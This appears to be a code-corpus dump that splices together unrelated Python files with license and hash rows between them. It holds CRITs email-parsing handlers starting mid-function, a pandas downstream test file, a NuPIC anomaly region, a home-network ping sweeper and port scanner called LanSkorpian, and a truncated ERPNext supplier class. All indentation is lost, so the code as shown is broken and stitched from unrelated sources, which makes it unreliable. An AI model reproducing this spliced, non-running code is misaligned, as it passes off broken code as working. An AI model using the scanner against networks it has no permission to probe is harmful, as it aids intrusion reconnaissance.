# to the previous header we found
if not isbody and not hfieldre.match(line):
line = " %s" % line
emldata.append(line)
emldata = "\n".join(emldata)
return handle_eml(emldata, sourcename, reference, analyst, method, parent_type,
parent_id, campaign, confidence, bucket_list, ticket)
def handle_eml(data, sourcename, reference, analyst, method, parent_type=None,
parent_id=None, campaign=None, confidence=None, bucket_list=None,
ticket=None):
"""
Take email in EML and convert them into an email object.
:param data: The data for the email.
:type data: dict
:param sourcename: The name of the source providing this email.
:type sourcename: str
:param reference: The reference to the data from the source.
:type reference: str
:param analyst: The user creating this email object.
:type analyst: str
:param method: The method of acquiring this email.
:type method: str
:param parent_type: The top-level object type of the parent.
:type parent_type: str
:param parent_id: The ObjectId of the parent.
:type parent_id: str
:param campaign: The campaign to attribute to this email.
:type campaign: str
:param confidence: Confidence level of the campaign.
:type confidence: str
:param bucket_list: The bucket(s) to assign to this data.
:type bucket_list: str
:param ticket: The ticket to assign to this data.
:type ticket: str
:returns: dict with keys:
"status" (boolean),
"reason" (str),
"object" The email object if successful,
"data" the converted email data,
"attachments" (dict).
"""
result = {
'status': False,
'reason': "",
'object': None,
'data': None,
'attachments': {}
}
if not sourcename:
result['reason'] = "Missing source information."
return result
msg_import = {'raw_header': ''}
reImap = re.compile(r"(\*\s\d+\sFETCH\s.+?\r\n)(.+)\).*?OK\s(UID\sFETCH\scompleted|Success)", re.M | re.S)
# search for SMTP dialog
start = data.find("DATA")
end = data.find("\x0d\x0a\x2e\x0d\x0a")
if start >= 0 and end >= 0:
premail = data[:start]
mailfrom = None
rcptto = None
for preheaders in premail.splitlines():
mfpos = preheaders.find("MAIL FROM")
if mfpos > -1:
try:
mailfrom = unicode(preheaders[mfpos + 10:])
except UnicodeDecodeError:
mailfrom = unicode(preheaders[mfpos + 10:], errors="replace")
rcpos = preheaders.find("RCPT TO")
if rcpos > -1:
try:
rcptto = unicode(preheaders[rcpos + 9:])
except UnicodeDecodeError:
rcptto = unicode(preheaders[rcpos + 9:], errors="replace")
if mailfrom:
msg_import['mailfrom'] = mailfrom
if rcptto:
msg_import['rcptto'] = rcptto
mail1 = data[start + 6:end]
stripped_mail = ""
for line in mail1.splitlines(True):
# Strip SMTP response codes. Some people like to grab a single
# TCP session in wireshark and save it to disk and call it an EML.
if line[:4] in ['200 ', '211 ', '214 ', '220 ', '221 ', '250 ',
'250-', '251 ', '354 ', '421 ', '450 ', '451 ',
'452 ', '500 ', '501 ', '502 ', '503 ', '504 ',
'521 ', '530 ', '550 ', '551 ', '552 ', '553 ',
'554 ']:
continue
stripped_mail += line
else:
# No SMTP dialog found, search for IMAP markers
match = reImap.search(data)
if match:
stripped_mail = match.groups()[1]
else:
stripped_mail = data
msg = eml.message_from_string(str(stripped_mail))
if not msg.items():
result['reason'] = """Could not parse email. Possibly the input does
not conform to a Internet Message style headers
and header continuation lines..."""
return result
# clean up headers
for d in msg.items():
cleand = ''.join([x for x in d[1] if (ord(x) < 127 and ord(x) >= 32)])
msg_import[d[0].replace(".",
"").replace("$",
"").replace("\x00",
"").replace("-",
"_").lower()] = cleand
msg_import['raw_header'] += d[0] + ": " + cleand + "\n"
# Rip out anything that looks like an email address and store it.
if 'to' in msg_import:
to_list = re.findall(r'[\w\-][\w\-\.]+@[\w\-][\w\-\.]+[a-zA-Z]{1,4}',
msg_import['to'])
msg_import['to'] = []
msg_import['to'] = [i for i in to_list if i not in msg_import['to']]
# Parse the body of the email
msg_import["raw_body"] = ""
for part in msg.walk():
if part.get_content_maintype() == 'multipart':
continue
if part.get_content_maintype() == "text":
content = part.get_payload(decode=True)
if content:
try:
message_part = unicode(content)
except UnicodeDecodeError:
message_part = unicode(content, errors="replace")
msg_import["raw_body"] = msg_import["raw_body"] + \
message_part + "\n"
# Check for attachment in mail parts
filename = part.get_filename()
attach = part.get_payload(decode=True)
if attach is not None and len(attach):
md5 = hashlib.md5(attach).hexdigest()
mtype = magic.from_buffer(attach)
if filename is not None:
try:
filename = unicode(filename)
except UnicodeDecodeError:
filename = unicode(filename, errors="replace")
else:
filename = md5
result['attachments'][md5] = {
'filename': filename,
'magic': mtype,
'blob': attach
}
result['data'] = msg_import
new_email = dict_to_email(result['data'])
if bucket_list:
new_email.add_bucket_list(bucket_list, analyst)
if ticket:
new_email.add_ticket(ticket, analyst)
if campaign:
if not confidence:
confidence = "low"
ec = EmbeddedCampaign(name=campaign,
confidence=confidence,
description="",
analyst=analyst,
date=datetime.datetime.now())
new_email.add_campaign(ec)
result['object'] = new_email
result['object'].source = [create_embedded_source(sourcename,
reference=reference,
method=method,
analyst=analyst)]
# Save the Email first, so we can have the id to use to create
# relationships.
if not result['object'].date:
result['object'].date = None
try:
result['object'].save(username=analyst)
result['object'].reload()
run_triage(result['object'], analyst)
except Exception, e:
result['reason'] = "Failed1 to save email.\n<br /><pre>" + \
str(e) + "</pre>"
return result
# Relate the email back to the pcap, if it came from PCAP.
if parent_id and parent_type:
rel_item = class_from_id(parent_type, parent_id)
if rel_item:
rel_type = RelationshipTypes.CONTAINED_WITHIN
ret = result['object'].add_relationship(rel_item,
rel_type,
analyst=analyst,
get_rels=False)
if not ret['success']:
result['reason'] = "Failed to create relationship.\n<br /><pre>"
+ result['message'] + "</pre>"
return result
# Save the email again since it now has a new relationship.
try:
result['object'].save(username=analyst)
except Exception, e:
result['reason'] = "Failed to save email.\n<br /><pre>"
+ str(e) + "</pre>"
return result
for (md5_, attachment) in result['attachments'].items():
if handle_file(attachment['filename'],
attachment['blob'],
sourcename,
method='eml_processor',
reference=reference,
related_id=result['object'].id,
user=analyst,
md5_digest=md5_,
related_type='Email',
campaign=campaign,
confidence=confidence,
bucket_list=bucket_list,
ticket=ticket,
relationship=RelationshipTypes.CONTAINED_WITHIN) == None:
result['reason'] = "Failed to save attachment.\n<br /><pre>"
+ md5_ + "</pre>"
return result
result['status'] = True
return result
def dict_to_email(d, save_unsupported=True):
"""
Convert a dictionary to an email.
Standardize all key names:
- Convert hyphens and whitespace to underscores
- Remove all non-alphanumeric and non-underscore characters.
- Combine multiple underscores.
- convert alpha characters to lowercase.
:param d: The dictionary to convert.
:type d: dict
:param save_unsupported: Whether or not to save unsupported fields.
:type save_unsupported: boolean
:returns: :class:`crits.email.email.Email`
"""
for key in d:
newkey = re.sub('[\s-]', '_', key)
newkey = re.sub('[\W]', '', newkey)
newkey = re.sub('_+', '_', newkey)
newkey = newkey.lower()
if key != newkey:
d[newkey] = d[key]
del d[key]
# Remove keys which we don't want the user to modify via YAML.
keys = ('schema_version', 'comments', 'objects', 'campaign',
'relationships', 'source', 'releasability', 'analysis',
'bucket_list', 'ticket', 'objects')
clean_dict(d, keys)
if 'x_originating_ip' in d and d['x_originating_ip']:
d['x_originating_ip'] = re.findall(r'[0-9]+(?:\.[0-9]+){3}',
d['x_originating_ip'])[0]
if 'date' in d and d['date']:
if isinstance(d['date'], datetime.datetime):
d['isodate'] = d['date']
d['date'] = str(d['date'])
else:
d['isodate'] = date_parser(d['date'], fuzzy=True)
if 'to' in d and isinstance(d['to'], basestring) and len(d['to']) > 0:
d['to'] = [d['to']]
if 'cc' in d and isinstance(d['cc'], basestring) and len(d['cc']) > 0:
d['cc'] = [d['cc']]
if 'from' in d:
d['from_address'] = d['from']
del d['from']
if save_unsupported:
for (k, v) in d.get('unsupported_attrs', {}).items():
d[k] = v
if 'unsupported_attrs' in d:
del d['unsupported_attrs']
crits_email = Email()
crits_email.merge(d)
return crits_email
def update_email_header_value(email_id, type_, value, analyst):
"""
Update a header value for an email.
:param email_id: The ObjectId of the email to update.
:type email_id: str
:param type_: The header type.
:type type_: str
:param value: The header value.
:type value: str
:param analyst: The user updating the header field.
:type analyst: str
:returns: dict with keys:
"success" (boolean),
"message" (str),
"isodate" (datetime.datetime) if the header field was "date".
"""
if type_ in ('to', 'cc'):
bad_chars = "<>^&(){}[]!#$%=+;:'/\|?~`"
if any((bad_char in value) for bad_char in bad_chars):
return {'success': False, 'message': "Invalid characters in list"}
email = Email.objects(id=email_id).first()
if email:
try:
if type_ in ('to', 'cc'):
vlist = value.split(",")
vfinal = []
for v in vlist:
if len(v.strip()) > 0:
vfinal.append(v.strip())
value = vfinal
setattr(email, type_, value)
if type_ == 'date':
isodate = date_parser(value, fuzzy=True)
email.isodate = isodate
email.save(username=analyst)
if type_ == 'date':
result = {'success': True,
'message': "Successfully updated email",
'isodate': email.isodate.strftime("%Y-%m-%d %H:%M:%S.%f")}
elif type_ in ('to', 'cc'):
links = ""
for v in value:
# dirty ugly hack to "urlencode" the resulting URL
url = reverse('crits.targets.views.target_info',
args=[v]).replace('@', '%40')
links += '<a href="%s">%s</a>, ' % (url, v)
result = {'success': True,
'message': "Successfully updated email",
'links': links}
else:
result = {'success': True,
'message': "Successfully updated email"}
except Exception, e:
result = {'success': False, 'message': e}
else:
result = {'success': False, 'message': "Could not find email"}
return result
def create_indicator_from_header_field(email, header_field, ind_type,
analyst, request):
"""
Create an indicator out of the header field.
:param email: The email to get the header from.
:type email: :class:`crits.emails.email.Email`
:param header_field: The header type.
:type header_field: str
:param ind_type: The Indicator type to use.
:type ind_type: str
:param analyst: The user updating the header field.
:type analyst: str
:param request: The Django request.
:type request: :class:`django.http.HttpRequest`
:returns: dict with keys:
"success" (boolean),
"message" (str),
"""
value = getattr(email, header_field)
# Check to make sure the "value" is valid
if value == None or value.strip() == "":
result = {
'success': False,
'message': "Can't create indicator from email field [" +
str(header_field) + "] with an empty value field",
}
return result
elif ind_type == None or ind_type.strip() == "":
result = {
'success': False,
'message': "Can't create indicator from email field " +
"with an empty type field",
}
return result
newindicator = handle_indicator_ind(value,
email.source,
ind_type,
threat_type=IndicatorThreatTypes.UNKNOWN,
attack_type=IndicatorAttackTypes.UNKNOWN,
analyst=analyst)
if newindicator.get('objectid'):
indicator = Indicator.objects(id=newindicator['objectid']).first()
results = email.add_relationship(indicator,
RelationshipTypes.RELATED_TO,
analyst=analyst,
get_rels=True)
if results['success']:
email.save(username=analyst)
relationship = {'type': 'Email', 'value': email.id}
message = render_to_string('relationships_listing_widget.html',
{'relationship': relationship,
'relationships': results['message']},
RequestContext(request))
result = {'success': True, 'message': message}
else:
result = {
'success': False,
'message': "Error adding relationship: %s" % results['message']
}
else:
result = {
'success': False,
'message': "Error adding relationship: Could not find email/indicator",
}
return result
def create_email_attachment(email, cleaned_data, analyst, source, method="Upload",
reference="", campaign=None, confidence='low',
bucket_list=None, ticket=None, filedata=None,
filename=None, md5=None, email_addr=None, inherit_sources=False):
"""
Create an attachment for an email.
:param email: The email to use.
:type email: :class:`crits.emails.email.Email`
:param cleaned_data: Cleaned form information about the email.
:type cleaned_data: dict
:param analyst: The user creating this attachment.
:type analyst: str
:param source: The name of the source.
:type source: str
:param method: The method for this file upload.
:type method: str
:param reference: The source reference.
:type reference: str
:param campaign: The campaign to attribute to this attachment.
:type campaign: str
:param confidence: The campaign confidence.
:type confidence: str
:param bucket_list: The list of buckets to assign to this attachment.
:type bucket_list: str
:param ticket: The ticket to assign to this attachment.
:type ticket: str
:param filedata: The attachment.
:type filedata: request file data.
:param filename: The name of the file.
:type filename: str
:param md5: The MD5 of the file.
:type md5: str
:param email_addr: Email address to which to email the sample
:type email_addr: str
:param inherit_sources: 'True' if attachment should inherit Email's Source(s)
:type inherit_sources: bool
:returns: dict with keys "success" (boolean) and "message" (str).
"""
response = {'success': False,
'message': 'Unknown error; unable to upload file.'}
if filename:
filename = filename.strip()
# If selected, new sample inherits the campaigns of the related email.
if cleaned_data.get('inherit_campaigns'):
if campaign:
email.campaign.append(EmbeddedCampaign(name=campaign, confidence=confidence, analyst=analyst))
campaign = email.campaign
inherited_source = email.source if inherit_sources else None
try:
if filedata:
result = handle_uploaded_file(filedata,
source,
method,
reference,
cleaned_data['file_format'],
cleaned_data['password'],
analyst,
campaign,
confidence,
related_id=email.id,
related_type='Email',
filename=filename,
bucket_list=bucket_list,
ticket=ticket,
inherited_source=inherited_source)
else:
if md5:
md5 = md5.strip().lower()
result = handle_uploaded_file(None,
source,
method,
reference,
cleaned_data['file_format'],
None,
analyst,
campaign,
confidence,
related_id=email.id,
related_type='Email',
filename=filename,
md5=md5,
bucket_list=bucket_list,
ticket=ticket,
inherited_source=inherited_source,
is_return_only_md5=False)
except ZipFileError, zfe:
return {'success': False, 'message': zfe.value}
else:
if len(result) > 1:
response = {'success': True, 'message': 'Files uploaded successfully. '}
elif len(result) == 1:
if not filedata:
response['success'] = result[0].get('success', False)
if(response['success'] == False):
response['message'] = result[0].get('message', response.get('message'))
else:
result = [result[0].get('object').md5]
response['message'] = 'File uploaded successfully. '
else:
response = {'success': True, 'message': 'Files uploaded successfully. '}
if not response['success']:
return response
else:
if email_addr:
for s in result:
email_errmsg = mail_sample(s, [email_addr])
if email_errmsg is not None:
response['success'] = False
msg = "<br>Error emailing sample %s: %s\n" % (s, email_errmsg)
response['message'] = response['message'] + msg
return response
def parse_ole_file(file):
"""
Parse an OLE2.0 file to obtain data inside an email including attachments.
References:
http://www.fileformat.info/format/outlookmsg/
http://www.decalage.info/en/python/olefileio
https://code.google.com/p/pyflag/source/browse/src/FileFormats/OLE2.py
http://cpansearch.perl.org/src/MVZ/Email-Outlook-Message-0.912/lib/Email/Outlook/Message.pm
"""
header = file.read(len(olefile.MAGIC))
# Verify the file is in OLE2 format first
if header != olefile.MAGIC:
return {'error': 'The upload file is not a valid Outlook file. It must be in OLE2 format (.msg)'}
msg = {'subject': '_0037',
'body': '_1000',
'header': '_007D',
'message_class': '_001A',
'recipient_email': '_39FE',
'attachment_name': '_3707',
'attachment_data': '_3701',
'attachment_type': '_370E',
}
file.seek(0)
data = file.read()
msg_file = io.BytesIO(data)
ole = olefile.OleFileIO(msg_file)
# Helper function to grab data out of stream objects
def get_stream_data(entry):
stream = ole.openstream(entry)
data = stream.read()
stream.close()
return data
# Parse the OLE streams and get attachments, subject, body, headers, and class
# The email dict is what will be put into MongoDB for CRITs
attachments = {}
email = {}
email['to'] = []
for entry in ole.listdir():
if 'attach' in entry[0]:
# Attachments are keyed by directory entry in the stream
# e.g. '__attach_version1.0_#00000000'
if entry[0] not in attachments:
attachments[entry[0]] = {}
if msg['attachment_name'] in entry[-1]:
attachments[entry[0]].update({'name': get_stream_data(entry).decode('utf-16')})
if msg['attachment_data'] in entry[-1]:
attachments[entry[0]].update({'data': get_stream_data(entry)})
if msg['attachment_type'] in entry[-1]:
attachments[entry[0]].update({'type': get_stream_data(entry).decode('utf-16')})
else:
if msg['subject'] in entry[-1]:
email['subject'] = get_stream_data(entry).decode('utf-16')
if msg['body'] in entry[-1]:
email['raw_body'] = get_stream_data(entry).decode('utf-16')
if msg['header'] in entry[-1]:
email['raw_header'] = get_stream_data(entry).decode('utf-16')
if msg['recipient_email'] in entry[-1]:
email['to'].append(get_stream_data(entry).decode('utf-16').lower())
if msg['message_class'] in entry[-1]:
message_class = get_stream_data(entry).decode('utf-16').lower()
ole.close()
# Process headers to extract data
headers = Parser().parse(io.StringIO(email.get('raw_header', '')), headersonly=True)
email['from_address'] = headers.get('From', '')
email['reply_to'] = headers.get('Reply-To', '')
email['date'] = headers.get('Date', '')
email['message_id'] = headers.get('Message-ID', '')
email['x_mailer'] = headers.get('X-Mailer', '')
email['x_originating_ip'] = headers.get('X-Originating-IP', '')
email['sender'] = getaddresses(headers.get_all('Sender', '')) # getaddresses returns list [(name, email)]
# If no sender, set the email address found in From:
if not email['sender']:
email['sender'] = getaddresses(headers.get_all('From', ''))
if len(email['sender']) > 0:
email['sender'] = email['sender'][0][1]
else:
email['sender'] = ''
# Get list of recipients and add to email['to'] if not already there
# Some emails do not have a stream for recipients (_39FE)
to = headers.get_all('To', [])
cc = headers.get_all('CC', [])
resent_to = headers.get_all('Resent-To', [])
resent_cc = headers.get_all('Resent-CC', [])
recipients = getaddresses(to + cc + resent_to + resent_cc)
for r in recipients:
addr = r[1].lower()
# If BCC then addr could be blank or set to undisclosed-recipients:
if addr and addr not in email['to'] and not re.match(r'^undisclosed-recipients[:;]?(?::;)?$', addr):
email['to'].append(addr)
# Check for encrypted and signed messages. The body will be empty in this case
# Message classes: http://msdn.microsoft.com/en-us/library/ee200767%28v=exchg.80%29.aspx
if message_class == 'ipm.note.smime' and not email.has_key('raw_body'):
email['raw_body'] = '<ENCRYPTED>'
if message_class == 'ipm.note.smime.multipartsigned' and not email.has_key('raw_body'):
email['raw_body'] = '<DIGITALLY SIGNED: body in smime.p7m>'
# Parse Received headers to get Helo and X-Originating-IP
# This can be unreliable since Received headers can be reordered by gateways
# and the date may not be in sync between systems. This is best effort based
# on the date as it appears in the Received header. In some cases there is no
# Received header present
#
# Received: from __ by __ with __ id __ for __ ; date
#
# See helper functions _get_received_from, _get_received_by, _get_received_date
current_datetime = datetime.datetime.now()
earliest_helo_date = current_datetime
earliest_ip_date = current_datetime
email['helo'] = ''
originating_ip = ''
last_from = ''
helo_for = ''
all_received = headers.get_all('Received')
crits_config = CRITsConfig.objects().first()
if crits_config:
email_domain = get_valid_root_domain(crits_config.crits_email.split('@')[-1])[0]
else:
email_domain = ''
if all_received:
for received in all_received:
received_from = _get_received_from(received).lower() # from __
received_by = _get_received_by(received).lower() # by __ with __ id __
received_for = _get_received_for(received).lower() # for <email>
date = _get_received_date(received) # date
try:
current_date = datetime.datetime.fromtimestamp(mktime_tz(parsedate_tz(date))) # rfc2822 -> Time -> Datetime
except:
# Exception will occur if the date is not in the Received header. This could be
# where the originating IP is. e.g. Received: from 11.12.13.14 by rms-us019 with HTTP
current_date = datetime.datetime.min
grp = re.search(r'\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b', received_from)
if grp and not _is_reserved_ip(grp.group()) and ' localhost ' not in received_from:
if email_domain not in received_from and email_domain in received_by:
if(current_date < earliest_helo_date):
helo_for = parseaddr(received_for.strip())[1]
earliest_helo_date = current_date
email['helo'] = received_from
else:
last_from = received_from
if grp and not email['x_originating_ip'] and not _is_reserved_ip(grp.group()):
if current_date < earliest_ip_date:
earliest_ip_date = current_date
originating_ip = grp.group()
# If no proper Helo found, just use the last received_from without a reserved IP
if not email['helo']:
email['helo'] = last_from
# Set the extracted originating ip. If not found, then just use the IP from Helo
if not email['x_originating_ip']:
if originating_ip:
email['x_originating_ip'] = originating_ip
else:
grp = re.search(r'\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b', email['helo'])
if grp:
email['x_originating_ip'] = grp.group()
# Add the email address found in Helo
if helo_for and '@' in helo_for:
if helo_for not in email['to']:
email['to'].append(helo_for)
# If no Helo date found, then try to use the Date field
if earliest_helo_date == current_datetime and email['date']:
earliest_helo_date = datetime.datetime.fromtimestamp(mktime_tz(parsedate_tz(email['date'])))
return {'email': email, 'attachments': attachments.values(), 'received_date': earliest_helo_date}
def _get_received_from(received_header):
"""
Helper function to grab the 'from' part of a Received email header.
"""
received_header = received_header.replace('\r', '').replace('\n', '')
info = received_header.split('by ')
try:
return info[0]
except:
''
def _get_received_by(received_header):
"""
Helper function to grab the 'by' part of a Received email header.
"""
received_header = received_header.replace('\r', '').replace('\n', '')
info = received_header.split('by ')
try:
return info[-1].split('for ')[0]
except:
return ''
def _get_received_for(received_header):
"""
Helper function to grab the 'for' part of a Received email header
WARNING: If 'for' is not there, the entire Received header is returned.
"""
received_header = received_header.replace('\r', '').replace('\n', '')
info = received_header.split('for ')
try:
return info[-1].split(';')[0]
except:
return ''
def _get_received_date(received_header):
"""
Helper function to grab the date part of a Received email header.
"""
received_header = received_header.replace('\r', '').replace('\n', '')
date = received_header.split(';')
try:
return date[-1]
except:
''
def _is_reserved_ip(ip):
"""
Simple test to detect if an IP is private or loopback. Does not check
validity of the address.
"""
grp = re.match(r'127.\d{1,3}.\d{1,3}.\d{1,3}', ip) # 127.0.0.0/8
if grp:
return True
grp = re.match(r'10.\d{1,3}.\d{1,3}.\d{1,3}', ip) # 10.0.0.0/8
if grp:
return True
grp = re.match(r'192.168.\d{1,3}.\d{1,3}', ip) # 192.168.0.0/16
if grp:
return True
grp = re.match(r'172.(1[6-9]|2[0-9]|3[0-1]).\d{1,3}.\d{1,3}', ip) # 172.16.0.0/12
if grp:
return True
# No matches
return False
| mit | 7,987,814,643,264,909,000 | 37.396138 | 123 | 0.529283 | false |
cbertinato/pandas | pandas/tests/test_downstream.py | 1 | 4179 | """
Testing that we work in the downstream packages
"""
import importlib
import subprocess
import sys
import numpy as np # noqa
import pytest
from pandas.compat import PY36
from pandas import DataFrame
from pandas.util import testing as tm
def import_module(name):
# we *only* want to skip if the module is truly not available
# and NOT just an actual import error because of pandas changes
if PY36:
try:
return importlib.import_module(name)
except ModuleNotFoundError: # noqa
pytest.skip("skipping as {} not available".format(name))
else:
try:
return importlib.import_module(name)
except ImportError as e:
if "No module named" in str(e) and name in str(e):
pytest.skip("skipping as {} not available".format(name))
raise
@pytest.fixture
def df():
return DataFrame({'A': [1, 2, 3]})
def test_dask(df):
toolz = import_module('toolz') # noqa
dask = import_module('dask') # noqa
import dask.dataframe as dd
ddf = dd.from_pandas(df, npartitions=3)
assert ddf.A is not None
assert ddf.compute() is not None
def test_xarray(df):
xarray = import_module('xarray') # noqa
assert df.to_xarray() is not None
def test_oo_optimizable():
# GH 21071
subprocess.check_call([sys.executable, "-OO", "-c", "import pandas"])
@tm.network
# Cython import warning
@pytest.mark.filterwarnings("ignore:can't:ImportWarning")
def test_statsmodels():
statsmodels = import_module('statsmodels') # noqa
import statsmodels.api as sm
import statsmodels.formula.api as smf
df = sm.datasets.get_rdataset("Guerry", "HistData").data
smf.ols('Lottery ~ Literacy + np.log(Pop1831)', data=df).fit()
# Cython import warning
@pytest.mark.filterwarnings("ignore:can't:ImportWarning")
def test_scikit_learn(df):
sklearn = import_module('sklearn') # noqa
from sklearn import svm, datasets
digits = datasets.load_digits()
clf = svm.SVC(gamma=0.001, C=100.)
clf.fit(digits.data[:-1], digits.target[:-1])
clf.predict(digits.data[-1:])
# Cython import warning and traitlets
@tm.network
@pytest.mark.filterwarnings("ignore")
def test_seaborn():
seaborn = import_module('seaborn')
tips = seaborn.load_dataset("tips")
seaborn.stripplot(x="day", y="total_bill", data=tips)
def test_pandas_gbq(df):
pandas_gbq = import_module('pandas_gbq') # noqa
@pytest.mark.xfail(reason="0.7.0 pending")
@tm.network
def test_pandas_datareader():
pandas_datareader = import_module('pandas_datareader') # noqa
pandas_datareader.DataReader(
'F', 'quandl', '2017-01-01', '2017-02-01')
# importing from pandas, Cython import warning
@pytest.mark.filterwarnings("ignore:The 'warn':DeprecationWarning")
@pytest.mark.filterwarnings("ignore:pandas.util:DeprecationWarning")
@pytest.mark.filterwarnings("ignore:can't resolve:ImportWarning")
@pytest.mark.skip(reason="gh-25778: geopandas stack issue")
def test_geopandas():
geopandas = import_module('geopandas') # noqa
fp = geopandas.datasets.get_path('naturalearth_lowres')
assert geopandas.read_file(fp) is not None
# Cython import warning
@pytest.mark.filterwarnings("ignore:can't resolve:ImportWarning")
def test_pyarrow(df):
pyarrow = import_module('pyarrow') # noqa
table = pyarrow.Table.from_pandas(df)
result = table.to_pandas()
tm.assert_frame_equal(result, df)
@pytest.mark.xfail(reason="pandas-wheels-50", strict=False)
def test_missing_required_dependency():
# GH 23868
# To ensure proper isolation, we pass these flags
# -S : disable site-packages
# -s : disable user site-packages
# -E : disable PYTHON* env vars, especially PYTHONPATH
# And, that's apparently not enough, so we give up.
# https://github.com/MacPython/pandas-wheels/pull/50
call = ['python', '-sSE', '-c', 'import pandas']
with pytest.raises(subprocess.CalledProcessError) as exc:
subprocess.check_output(call, stderr=subprocess.STDOUT)
output = exc.value.stdout.decode()
for name in ['numpy', 'pytz', 'dateutil']:
assert name in output
| bsd-3-clause | -6,467,225,624,213,887,000 | 26.493421 | 73 | 0.680785 | false |
tomsilver/nupic | nupic/regions/AnomalyRegion.py | 1 | 2946 | # ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2015, Numenta, Inc. Unless you have purchased from
# Numenta, Inc. a separate commercial license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""Region for computing the anomaly score."""
import numpy
from nupic.algorithms import anomaly
from nupic.regions.PyRegion import PyRegion
class AnomalyRegion(PyRegion):
"""Region for computing the anomaly score."""
@classmethod
def getSpec(cls):
return {
"description": ("Region that computes anomaly scores from temporal "
"memory."),
"singleNodeOnly": True,
"inputs": {
"activeColumns": {
"description": "The currently active columns.",
"regionLevel": True,
"dataType": "Real32",
"count": 0,
"required": True,
"isDefaultInput": False,
"requireSplitterMap": False,
},
"predictedColumns": {
"description": "The currently predicted columns.",
"regionLevel": True,
"dataType": "Real32",
"count": 0,
"required": True,
"isDefaultInput": False,
"requireSplitterMap": False,
},
},
"outputs": {
"rawAnomalyScore": {
"description": "The raw anomaly score.",
"dataType": "Real32",
"count": 1,
"regionLevel": True,
"isDefaultOutput": True,
},
},
"parameters": {
},
"commands": {
},
}
def __init__(self, *args, **kwargs):
self.prevPredictedColumns = numpy.zeros([], dtype="float32")
def initialize(self, inputs, outputs):
pass
def compute(self, inputs, outputs):
activeColumns = inputs["activeColumns"].nonzero()[0]
rawAnomalyScore = anomaly.computeRawAnomalyScore(
activeColumns, self.prevPredictedColumns)
self.prevPredictedColumns = inputs["predictedColumns"].nonzero()[0]
outputs["rawAnomalyScore"][0] = rawAnomalyScore
| gpl-3.0 | 5,956,932,422,393,378,000 | 30.677419 | 76 | 0.569246 | false |
rrice2004/LanSkorpian | LanSkorpian.py | 1 | 3034 | ## LANSKORPIAN - Personal home network scanner
## Copyright (C) Robert Rice <[email protected]>
## This program is published under a MIT license
print "\n"
print ("-" * 60)
print " LANSKORPIAN Personal Home Port Scanner"
print ("-" * 60)
print "\n"
# Import modules
import subprocess
import ipaddress
from datetime import datetime
import socket
import sys
from com_ports import*
# input a network address
net_addr = raw_input("Enter a network address in CIDR format(ex.192.168.1.0/24): ")
start_time = datetime.now()
# Banner
print ("-" * 60)
print "Please wait, scanning network", net_addr
print ("-" * 60)
# Create the network
ip_net = ipaddress.ip_network(net_addr)
# Get all hosts on that network
all_hosts = list(ip_net.hosts())
# Configure subprocess to hide the console window
info = subprocess.STARTUPINFO()
info.dwFlags |= subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = subprocess.SW_HIDE
# For each IP address in the subnet,
# run the ping command with subprocess.popen interface
for i in range(len(all_hosts)):
output = subprocess.Popen(['ping', '-n 5', '1', '-w', '100', str(all_hosts[i])], stdout=subprocess.PIPE, startupinfo=info).communicate()[0]
if "Destination host unreachable" in output.decode('utf-8'):
pass
elif "Request timed out" in output.decode('utf-8'):
pass
else:
print(str(all_hosts[i]) + " is Active")
stop_time = datetime.now()
total = stop_time - start_time
print 'Scanning Completed in: ', total
print "\n"
####################################################################
# Start individual host scan
remoteServer = raw_input("Enter Active host to scan: ")
remoteServerIP = socket.gethostbyname(remoteServer)
name = socket.getfqdn(remoteServerIP)
# Banner
print ("-" * 60)
print "Please wait, scanning Active host", name
print ("-" * 60)
# Check what time the scan started
t1 = datetime.now()
# check and returns the service name if available
def get_service(port):
port = str(port)
if port in common_ports:
return common_ports[port]
else:
return unknown_ports
#start scanning ports
try:
for port in range(1,1025):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((remoteServerIP, port))
if result == 0:
print "Port {}: Open".format(port), get_service(port)
sock.close()
except KeyboardInterrupt:
t2 = datetime.now()
cancel = t2 - t1
print "Scan cancled by user in:", cancel
sys.exit()
except socket.gaierror:
print 'Hostname could not be resolved. Exiting'
sys.exit()
except socket.error:
print "Couldn't connect to server"
sys.exit()
# Checking the time again
t3 = datetime.now()
# Calculates the difference of time, to see how long it took to run the script
total = t3 - t1
# Printing the information to screen
print 'Scanning Completed in: ', total
| mit | 7,584,437,968,339,130,000 | 24.155172 | 143 | 0.644693 | false |
shitolepriya/Saloon_erp | erpnext/buying/doctype/supplier/supplier.py | 1 | 4173 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
import frappe.defaults
from frappe import msgprint, _
from frappe.model.naming import make_autoname
from erpnext.utilities.address_and_contact import load_address_and_contact
from erpnext.utilities.transaction_base import TransactionBase
from erpnext.accounts.party import validate_party_accounts
class Supplier(TransactionBase):
def get_feed(self):
return self.supplier_name
def onload(self):
"""Load address and contacts in `__onload`"""
load_address_and_contact(self, "supplier")
def autoname(self):
supp_master_name = frappe.defaults.get_global_default('supp_master_name')
if supp_master_name == 'Supplier Name':
self.name = self.supplier_name
# self.name = self.supplier_name + '-' + self.company
else:
self.name = make_autoname(self.naming_series + '.#####')
# self.name = make_autoname(self.company + '-' + self.naming_series + '.#####')
def update_address(self):
frappe.db.sql("""update `tabAddress` set supplier_name=%s, modified=NOW()
where supplier=%s""", (self.supplier_name, self.name))
def update_contact(self):
frappe.db.sql("""update `tabContact` set supplier_name=%s, modified=NOW()
where supplier=%s""", (self.supplier_name, self.name))
def on_update(self):
if not self.naming_series:
self.naming_series = ''
self.update_address()
self.update_contact()
def validate(self):
#validation for Naming Series mandatory field...
if frappe.defaults.get_global_default('supp_master_name') == 'Naming Series':
if not self.naming_series:
msgprint(_("Series is mandatory"), raise_exception=1)
validate_party_accounts(self)
def get_contacts(self,nm):
